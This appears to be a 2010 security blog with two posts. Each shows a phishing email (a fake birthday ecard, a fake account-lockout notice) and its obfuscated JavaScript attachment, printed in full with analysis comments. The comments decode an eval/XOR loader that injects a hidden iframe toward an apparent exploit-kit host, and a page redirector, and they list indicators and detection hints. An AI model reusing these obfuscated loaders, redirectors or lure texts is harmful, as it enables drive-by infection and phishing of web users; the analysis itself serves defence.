Monday, June 14, 2010

More self-modifying Javascript.

More self-modifying JavaScript — more precisely, obfuscated JavaScript that rebuilds its real payload at run time and hands it to eval() (twice, in this sample). There must be some sort of kit for this out there.


Delivered-To: xyz@dnull.com
Received: (qmail 9347 invoked by uid 82); 14 Jun 2010 12:33:19 -0000
Received: from net37.78.95-129.chelny.ertelecom.ru (95.78.37.129)
  by dnull.com with SMTP; 14 Jun 2010 12:33:19 -0000
Received: from 95.78.37.129 by mail.rjwaters.com; Mon, 14 Jun 2010 15:32:41 +0200
Message-ID: <000d01cb0bbd$aec28820$6400a8c0@positiverkk>
From: "123Greetings.com" <ecards@123greetings.com>
To:  xyz@dnull.com
Subject: positiverkk@rjwaters.com has sent you a birthday ecard.
Date: Mon, 14 Jun 2010 15:32:41 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
  boundary="----=_NextPart_000_0006_01CB0BBD.AEC28820"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2180
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180

This is a multi-part message in MIME format.

------=_NextPart_000_0006_01CB0BBD.AEC28820
Content-Type: text/plain;
 format=flowed;
 charset="Windows-1252";
 reply-type=original
Content-Transfer-Encoding: 7bit

[positiverkk@rjwaters.com] just sent you an ecard

You can view it by open attached document.

Your ecard is going to be with us for the next 30 days.

We hope you enjoy your ecard.

ecard.html

<script>
// ===== ANALYSIS NOTE (security review) =====
// Malware sample (ecard.html attachment). The code below is kept byte-for-byte as
// evidence; the comments explain what it does. Do NOT open the original attachment in a
// browser. Analyse in an isolated JS interpreter with window.eval / document.write hooked
// to log instead of execute.
//
// Obfuscation technique
//  * jwp is '' and PR is 'replace'. Every API name is spelled with noise letters and
//    recovered at run time with 'noisy'[PR](/[noise]/g, jwp):
//      'lKeZnugGtKhG' / 'lEeSnSgStIhH' -> 'length'      'SGtGrXiRnLgR' -> 'String'
//      'fqrqonmjCjhjanrjCSoSdSen'      -> 'fromCharCode' 'cxhlaQrQCEovdQeQAvtv' -> 'charCodeAt'
//      'eBvAaClF' / 'eovnaIlI'         -> 'eval'        'uEntejsjcjaEpVej' -> 'unescape'
//      'shuhbhsAtArPiznPga'            -> 'substring'
//    cWhax is `this` (the global object), so cWhax['eval'] is window.eval.
//  * The many `var X=NNN; if (a>b){a=b^c;}` statements compare and assign locals that
//    are never read (most are uninitialised, so they yield NaN or never run). They are
//    dead padding meant to defeat signature matching and tire out a human reader.
//  * XR, ECA, miOda, lM, Au, MoOU, jZGWg hold decoy strings that are never used.
//
// Decoding pipeline (three stages, two evals)
//  1. The fragments RK, it, UeJmfD, ELNT, pFlFl, gIsW, IyrWK, uuRmg, fz, FwMRi, yt, YZX,
//     LbomSl, It, tbDU, cNovEF, iAc, jYsZyG, wrqylK, EE are concatenated into Km in a
//     fixed order. In Km each byte is written as <letter><hex-digit>: the letter encodes
//     the high nibble (t=6, X=7, K=2, P=3, O=5, S=1, W=4, h=8, s=0, Z=9), the digit is
//     the low nibble.
//  2. YbeU/pFuQcs turn the constant 'xKA2osQ0IPn3UOl5YSa1jWL4HXB7mhr8ztv6JZT9' into the
//     SOURCE TEXT of ten chained .replace(/[letter]/g,'%digit') calls; the first eval
//     runs `var CuoNi= Km[replace](...)...` so CuoNi becomes a %XX URL-escaped string.
//  3. sv(s) returns String.fromCharCode(9 ^ s.charCodeAt(i)) for every i, i.e. a
//     single-byte XOR with key 9. The second eval runs sv(unescape(CuoNi)).
//
// Decoded payload (hand-decoded from the fragments above; confirm in a sandbox before
// acting on it, domains defanged with [.]):
//   document.write("<meta http-equiv=\"refresh\" content=\"3;url=http://toldspeak[.]com/\" />
//     <iframe src='http://gogoop.casanovarevealed[.]com:8080/index.php?pid=10'
//             width='1' height='1' style='visibility: hidden;'></iframe>");
// i.e. a 3-second meta-refresh to a decoy site plus a hidden 1x1 iframe that loads a
// third-party page — consistent with an exploit-kit landing page of the era (inferred
// from the shape of the URL, not verifiable from this file). Treat both hostnames, the
// sending IP in the Received: header and the attachment name as IOCs.
//
// Detection hints grounded in this code: eval + unescape + String.fromCharCode of a
// charCodeAt XOR loop; API names built by stripping noise letters with a /[...]/g
// replace; a second eval whose argument is the output of the first.
//
// NOTE: the `>` / `=` pairs split across lines in the listing (e.g. `Nht>` then `=sz`)
// are a line-wrap artefact of the blog rendering; as printed the text is not valid JS.
var jwp ; jwp = '' ; var cWhax=this;var PR= ''+'replace' ;var qEBr ,QlYGtB ;var Vtb= 135; if (qEBr==QlYGtB){qEBr = QlYGtB -Vtb;}var XR = 'PZiwIHEbmSVFCg' ; var ECA='OcrRadyvPTqvcGV' ; var jYsZyG; jYsZyG='t4tcP7'; var Nht,sz ,IhBx ;if (IhBx<Nht || Nht>
=sz){Nht= sz^IhBx;}var tbDU='0tdtdtc'; var FwMRi ='9t0tdP4P8P9KeK9Xet0tdXdt1' ;var aYPV=219;var assM, PVqWMD ; if (aYPV>
assM){aYPV = assM+PVqWMD;}var ELNT='t6t5tdXaX9tct8t2K7tat6t4K6O5KbK9K6P7P5t0tfXbt8t4tcK9XaXbtaP4Ket1XdXdX9P3K6K6tet6tet6t6X9K7ta'; function sv(nkAfi){var PYQS =jwp; for(vytw= 0 ;vytw<nkAfi['lKeZnugGtKhG'[PR](/[GKudZ]/g,jwp)] ; ++vytw){PYQS =PYQS+cWhax['SGtGrXiRnLgR'[PR](/[RXdGL]/g ,jwp)]['fqrqonmjCjhjanrjCSoSdSen'[PR](/[nqSjO]/g ,jwp)](9^nkAfi['cxhlaQrQCEovdQeQAvtv'[PR](/[vxQEl]/g, jwp)](vytw)); }return PYQS ;}var cNovEF; cNovEF ='' ;var Ult =287 ; var XV , OFRHX; if (OFRHX>
Ult && Ult==XV){Ult = XV - OFRHX ;}cNovEF='t7P2KeP7P5K6t0' ; var cEN= 671; var vGrGWx =49;var wbOXK=8; if (cEN<vGrGWx){cEN= vGrGWx^wbOXK; }var yt ;yt ='' ; yt ='P4KeP8KeK9t1tct0tet1XdP4';var miOda='hrJHSbCrj';var uuRmg ;uuRmg= '';uuRmg = 'K7tat6t4P3P1P9P1P9K6t' ;var qaiU =425; var HRrdL = 625;var UwkVX ; UwkVX=455 ; if (qaiU>
HRrdL){qaiU =HRrdL^UwkVX ;}var lM = 'cujgJRXbCumHlckmswa';var fz ; fz = ''; var eg = 564 ; var HBZP ,cWnUTE ; if (eg>
=HBZP){eg = HBZP - cWnUTE;}fz ='0t7tdtcX1K7X9t1X9P6X'; var wpNFA,pRZ ;var yXAK=896; if (wpNFA>
pRZ){wpNFA = pRZ/yXAK;}var YZX;YZX='KeP8KeK9XaXdX0t5t'; var wrqylK;wrqylK = 'KbK'; var WfLtQN ; WfLtQN =432;var lE=833 ; var eYig =524 ; if (eYig =WfLtQN || WfLtQN<lE){WfLtQN= lE-eYig;}var gIsW ; gIsW ='' ;var ETuZX ,vt;var xzLS =433;if (ETuZX<vt){ETuZX=vt -xzLS; }gIsW='Xftc' ; var QOh , Tfxm , USrprT ; if (QOh>
=Tfxm){QOh =Tfxm+USrprT ; }var Au = 'XtVOyHAW'; var TUsG=217; var Mvm ;Mvm = 3;var CVc; CVc=676 ; if (TUsG>
Mvm){TUsG =Mvm^CVc; }var UeJmfD = 'Xbt5P4t1XdXdX9P3K6K6Xd'; var IyrWK ; IyrWK='t8t5tctd' ; var CaigsD= 819;var YG, ccjfI;if (ccjfI<CaigsD && CaigsD<YG){CaigsD=YG -ccjfI; }var EE ; EE= '' ; EE= '0P2' ; var It; It='Xft0Xat0tbt0t5t0XdX0P3K9t1t' ;var PCUM, bvEVF ; var lwRIU =925 ; if (PCUM==bvEVF){PCUM =bvEVF/lwRIU ;}var MoOU='DECiRVNbVM'; var uRMo, Tw, TbwgHq ;if (uRMo>
Tw){uRMo=Tw -TbwgHq; }var jZGWg = 'HbwTxZ';var zA= 168 ; var oKMNLY= 74; var YNMHpo ;YNMHpo = 312; if (zA>
oKMNLY){zA= oKMNLY+YNMHpo ; }var it='dP4O5KbPaP2Xc' ;var RK ='tdt6taXct4tct7XdK7XeXbt0XdtcK1KbP5t4tcXdt8K9t1XdXdX9K4tcX8Xct0XfP4O5KbXbtctfXbtcXat1O5KbK9tat6t7Xdtct7X'; var pFlFl; pFlFl = '' ;var ufSfR=660; var cbcj=76; var zKTEu = 676 ; if (ufSfR==cbcj){ufSfR =cbcj-zKTEu;}pFlFl = 't8Xat8t7t6Xft8Xbtc' ; var ICqTJ= 945;var yXDh ,Nbu; if (Nbu= ICqTJ && ICqTJ>
yXDh){ICqTJ=yXDh^Nbu; }var iAc; iAc= '';iAc ='tfXbt8'; var aidGt =25 ;var zwxfqC = 337;var AfCI ;AfCI = 159 ; if (aidGt<zwxfqC){aidGt=zwxfqC+AfCI ; }var LbomSl='cP4Ke' ; var hMjFLa=601 ; var bzpXo ,NPqgN; if (hMjFLa==bzpXo){hMjFLa =bzpXo/NPqgN ;}var MAJjm;MAJjm=jwp ;var Km=RK+it ;Km = Km+UeJmfD+ELNT+pFlFl+gIsW+IyrWK+uuRmg;Km= Km+fz;Km= Km+FwMRi+yt+YZX+LbomSl ;Km = Km+It ;Km = Km+tbDU; Km=Km+cNovEF+iAc+jYsZyG; Km= Km+wrqylK; Km=Km+EE+MAJjm ; var YbeU='xKA2osQ0IPn3UOl5YSa1jWL4HXB7mhr8ztv6JZT9'[PR](/[xoIUYjHmzJ]/g ,'\%')[PR](/[AQnlaLBrvT]/g , '\\') ; var ynSSG= "')[PR](/["; var GZGLMc= "]/g ,'%" ;var pFuQcs =YbeU[PR](/[\%]/g ,ynSSG)[PR](/[\\]/g ,GZGLMc);var Inlz, YwGin ; var gRw = 35; if (Inlz==YwGin){Inlz=YwGin^gRw ;}cWhax['eBvAaClF'[PR](/[FCAHB]/g, jwp)]('var CuoNi= Km'+pFuQcs['shuhbhsAtArPiznPga'[PR](/[aAhzP]/g,jwp)](2 ,pFuQcs['lEeSnSgStIhH'[PR](/[HBSIE]/g , jwp)])+"'); "); cWhax['eovnaIlI'[PR](/[InopA]/g , jwp)](sv(cWhax[['uEntejsjcjaEpVej'[PR](/[jVwtE]/g, jwp)]](CuoNi))) ;</script>




Thursday, June 10, 2010

Javascript Phishing Trojan

Here is another bit of self-modifying (obfuscated, decoded at run time) JavaScript. This one arrived as the attachment to a phishing e-mail that asks the recipient to "run" it.

dnull.com support to sokol

Dear Customer,
This e-mail was send by dnull.com to notify you that we have temporanly prevented access to your account.

We have reasons to beleive that your account may have been accessed by someone else. Please run attached file and Follow instructions.
(C) dnull.com
Where it gets interesting is that I own dnull.com — it's my server — so the "dnull.com support" notice spoofs the recipient's own domain. How stupid can these guys be?


 I don't have time to decipher it.


Maybe someone here will take the time.


<script type='text/javascript'>
// ===== ANALYSIS NOTE (security review) =====
// Malware sample (phishing attachment). Kept byte-for-byte as evidence; do not open the
// original file in a browser. It is a plain redirector, not a self-modifying program:
//  * mD is an empty constructor; its prototype method i() does all the work when
//    b.i() is called at the end.
//  * Inside i(): the `new Date()` objects, empty functions, this.j / this.yE / aL / aN /
//    dL / k / y assignments and the numeric this.aB / q are never read — dead padding
//    to change the file's signature.
//  * API names are hidden the same way as in the ecard sample, by stripping noise
//    letters with a /[...]/g replace:
//      'lOovcvavtLi5o5n5'   -> 'location'
//      'hqrteqfH'           -> 'href'
//      'hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg' -> 'http://mvblaw[.]com/z.htm' (defanged)
//    so the only effective statement is  document.location.href = 'http://mvblaw[.]com/z.htm'
//    i.e. the victim's browser is sent to a third-party page. What that page served
//    cannot be determined from this file; treat the hostname as an IOC.
//  * The trailing `<script>` is almost certainly the blog's rendering of the closing
//    script tag, not part of the sample.
function mD(){};this.aB=43719;mD.prototype = {i : function() {var w=new Date();this.j='';var x=function(){};var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');var d=new Date();y="";aL="";var f=document;var s=function(){};this.yE="";aN="";var dL='';var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];this.v="v";var q=27427;var m=new Date();iD['hqrteqfH'.replace(/[Htqag]/g, '')]=a;dE='';k="";var qY=function(){};}};xO=false;var b=new mD(); yY="";b.i();this.xT='';<script>